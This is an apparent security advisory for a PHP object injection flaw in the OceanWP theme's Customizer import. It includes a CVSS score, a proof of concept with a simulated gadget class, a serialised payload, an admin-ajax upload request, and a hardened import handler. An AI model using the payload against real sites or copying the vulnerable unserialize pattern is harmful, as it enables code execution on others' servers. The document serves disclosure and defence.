CVSS3 score: 7.2 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
The plugin unserialises the content of an imported file, which could lead to PHP object injection when a high-privilege user imports (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.
To simulate a gadget chain, put the following code in a plugin and activate it:
<?php
/* Plugin Name: Evil Gadget (PoC) */
class Evil {
    // Called by unserialize() as soon as an Evil object is rebuilt
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}
Create a file named import.dat with the following content: O:4:"Evil":0:{};
Import the file via the "Import Customizer Styling" feature in Appearance > OceanWP > Customizer (requires the OceanWP theme to be active).
Then view the response of the import request, which will contain the "Arbitrary deserialization" message:
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=oceanwp
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------371888087213614698033751989022
Content-Length: 542
Connection: close
Cookie: [admin+]
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="file"; filename="localhost-wordpress-oceanwp-export.dat"
Content-Type: application/octet-stream
O:4:"Evil":0:{};
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="action"
oceanwp_cp_customizer_import
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="_nonce"
166c9022e0
-----------------------------371888087213614698033751989022--
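The following is an added example, not the plugin's own code or the advisory's PoC: a minimal import handler of the shape the advisory describes (unserialize() called on the uploaded file's content) next to a hardened version that refuses to instantiate any class. The function names vulnerable_import and hardened_import are hypothetical; the Evil class is the page's simulated gadget, and the three serialised inputs are constructed for this example.

```php
<?php
// Added example, not the plugin's code. Function names are hypothetical.

class Evil {
    // Magic method run by unserialize() as soon as an Evil object is rebuilt.
    public function __wakeup(): void {
        echo "Arbitrary deserialization\n";
    }
}

// Vulnerable: any class named in the serialised data is instantiated and its
// magic methods (__wakeup, __destruct, __toString, ...) run with the importer's
// privileges. With a real gadget chain on the blog this becomes code execution.
function vulnerable_import(string $raw)
{
    return unserialize($raw);
}

// Hardened: forbid object instantiation entirely. A class name in the input
// becomes a __PHP_Incomplete_Class placeholder whose magic methods never run,
// and the result is additionally checked to be an array of plain values.
function hardened_import(string $raw): ?array
{
    $data = unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return null; // a Customizer export is expected to be an array of settings
    }
    array_walk_recursive($data, function ($value): void {
        // Placeholder objects are neither scalar nor null, so they are caught here.
        if (!is_scalar($value) && $value !== null) {
            throw new InvalidArgumentException('objects are not allowed in a Customizer import');
        }
    });
    return $data;
}

// Constructed inputs: the page's payload, the same gadget nested inside an
// array (as a real export would be shaped), and a benign settings array.
$gadget = 'O:4:"Evil":0:{}';
$nested = 'a:1:{s:8:"ocean_id";O:4:"Evil":0:{}}';
$benign = 'a:1:{s:9:"site_logo";s:9:"/logo.png";}';

vulnerable_import($gadget);            // prints "Arbitrary deserialization"

var_dump(hardened_import($gadget));    // NULL: top-level value is not an array
try {
    hardened_import($nested);          // __wakeup never fires; input is rejected
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
var_dump(hardened_import($benign));    // array(1) { ["site_logo"]=> string(9) "/logo.png" }
```

Note that the nonce and the capability check on the AJAX action do not help here: the feature is meant for administrators, which is why Privileges Required is HIGH, and the problem is the format itself. The allowed_classes option (PHP 7.0+) is the minimum mitigation for data that must stay in PHP's serialisation format; an assumption worth stating is that a format which cannot encode objects at all, such as JSON, is the safer long-term choice for an import/export feature.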